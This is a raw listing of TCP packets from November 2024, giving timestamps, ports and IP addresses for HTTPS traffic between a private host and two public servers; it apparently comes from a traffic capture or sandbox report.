Nov 7, 2024 07:33:12.236824036 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.236880064 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.236885071 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.236922026 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.284316063 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.284331083 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.284400940 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.284408092 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.284445047 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.285818100 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.285831928 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.285890102 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.285895109 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.285931110 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.350028038 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.350044966 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.350100040 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.350110054 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.350145102 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.351773024 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.351787090 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.351836920 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.351841927 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.351878881 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.353204966 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.353220940 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.353266001 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.353271008 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.353300095 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.356904030 CET	443	49810	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.357028008 CET	443	49810	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.357078075 CET	49810	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.357108116 CET	49810	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.357117891 CET	443	49810	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.357126951 CET	49810	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.357132912 CET	443	49810	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.359647036 CET	49815	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.359673023 CET	443	49815	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.359733105 CET	49815	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.359893084 CET	49815	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.359905958 CET	443	49815	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.400330067 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.400346041 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.400408030 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.400413990 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.400449991 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.402195930 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.402209997 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.402259111 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.402265072 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.402297974 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.417957067 CET	443	49811	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.423235893 CET	49811	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.423255920 CET	443	49811	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.423619986 CET	49811	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.423624992 CET	443	49811	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.465749979 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.465765953 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.465825081 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.465832949 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.465873003 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.467447042 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.467458963 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.467515945 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.467519999 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.467560053 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.514514923 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.514528990 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.514595032 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.514601946 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.514636993 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.515722036 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.515739918 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.515793085 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.515798092 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.515836000 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.518162966 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.518179893 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.518228054 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.518234015 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.518275023 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.551146030 CET	443	49811	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.551279068 CET	443	49811	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.551343918 CET	49811	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.551520109 CET	49811	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.551531076 CET	443	49811	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.551542044 CET	49811	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.551547050 CET	443	49811	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.553942919 CET	49816	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.553978920 CET	443	49816	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.554054976 CET	49816	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.554214001 CET	49816	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.554224968 CET	443	49816	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.581145048 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.581161022 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.581226110 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.581232071 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.581273079 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.582403898 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.582417965 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.582475901 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.582480907 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.582520008 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.585722923 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.585736990 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.585791111 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.585797071 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.585830927 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.631093025 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.631108999 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.631176949 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.631185055 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.631222963 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.632715940 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.632729053 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.632783890 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.632790089 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.632827044 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.667970896 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.667990923 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.668054104 CET	443	49812	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.668059111 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.668073893 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.668126106 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.668437004 CET	49812	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.668459892 CET	443	49812	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.668839931 CET	49812	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.668845892 CET	443	49812	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.697762966 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.697782040 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.697865963 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.697879076 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.697921038 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.699270010 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.699284077 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.699342966 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.699348927 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.699387074 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.700876951 CET	443	49814	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.701191902 CET	49814	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.701203108 CET	443	49814	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.701562881 CET	49814	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.701566935 CET	443	49814	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.707230091 CET	443	49813	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.707468987 CET	49813	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.707495928 CET	443	49813	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.707786083 CET	49813	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.707791090 CET	443	49813	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.745412111 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.745429039 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.745512962 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.745537043 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.745579004 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.746980906 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.746995926 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.747057915 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.747065067 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.747102976 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.748622894 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.748636961 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.748673916 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.748681068 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.748704910 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.748723030 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.796084881 CET	443	49812	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.796340942 CET	443	49812	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.796396971 CET	49812	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.796428919 CET	49812	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.796447039 CET	443	49812	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.796456099 CET	49812	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.796459913 CET	443	49812	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.799181938 CET	49817	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.799237013 CET	443	49817	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.799482107 CET	49817	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.799482107 CET	49817	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.799521923 CET	443	49817	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.811548948 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.811568022 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.811635017 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.811645985 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.811685085 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.813025951 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.813039064 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.813100100 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.813106060 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.813148022 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.814838886 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.814851999 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.814899921 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.814904928 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.814933062 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.814951897 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.831248045 CET	443	49814	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.831295967 CET	443	49814	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.831396103 CET	49814	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.831527948 CET	49814	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.831535101 CET	443	49814	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.831542969 CET	49814	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.831546068 CET	443	49814	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.833556890 CET	49818	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.833585978 CET	443	49818	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.833659887 CET	49818	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.833792925 CET	49818	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.833807945 CET	443	49818	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.840116978 CET	443	49813	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.840265036 CET	443	49813	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.840317965 CET	49813	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.840364933 CET	49813	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.840377092 CET	443	49813	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.840411901 CET	49813	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.840415955 CET	443	49813	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.842122078 CET	49819	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.842154026 CET	443	49819	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.842226982 CET	49819	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.842331886 CET	49819	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:12.842341900 CET	443	49819	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:12.861793995 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.861814976 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.861881018 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.861887932 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.861920118 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.861933947 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.863117933 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.863132954 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.863193035 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.863198042 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.863238096 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.864886045 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.864902973 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.864950895 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.864957094 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.864995003 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.927273989 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.927289963 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.927331924 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.927336931 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.927360058 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.927377939 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.928998947 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.929012060 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.929049969 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.929055929 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.929069996 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.929095030 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.929902077 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.929917097 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.929971933 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.929976940 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.930012941 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.977355003 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.977370024 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.977416039 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.977420092 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.977458000 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.978763103 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.978775978 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.978816032 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.978821039 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.978846073 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.978863955 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.980621099 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.980638981 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.980664968 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.980669975 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:12.980695009 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:12.980710983 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.042332888 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.042349100 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.042434931 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.042439938 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.042481899 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.043720961 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.043736935 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.043785095 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.043791056 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.043840885 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.045588970 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.045602083 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.045650005 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.045656919 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.045677900 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.045685053 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.078828096 CET	443	49815	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.079355955 CET	49815	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.079371929 CET	443	49815	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.079763889 CET	49815	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.079768896 CET	443	49815	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.092148066 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.092161894 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.092248917 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.092253923 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.092294931 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.093924999 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.093939066 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.093981981 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.093987942 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.094023943 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.095259905 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.095273972 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.095308065 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.095316887 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.095335007 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.095351934 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.131365061 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.131378889 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.131445885 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.131454945 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.131494999 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.168689013 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.168704987 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.168773890 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.168780088 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.168821096 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.169600964 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.169653893 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.169666052 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.169698000 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.169832945 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:13.169845104 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:13.207246065 CET	443	49815	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.207391977 CET	443	49815	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.207442999 CET	49815	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.207524061 CET	49815	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.207530022 CET	443	49815	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.207540035 CET	49815	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.207544088 CET	443	49815	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.209862947 CET	49820	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.209893942 CET	443	49820	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.209964037 CET	49820	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.210102081 CET	49820	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.210114002 CET	443	49820	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.311130047 CET	443	49816	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.311506987 CET	49816	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.311532021 CET	443	49816	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.312000036 CET	49816	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.312005043 CET	443	49816	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.444623947 CET	443	49816	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.444854975 CET	443	49816	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:13.444914103 CET	49816	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:13.466203928 CET	49816	443	192.168.2.4	13.107.246.45
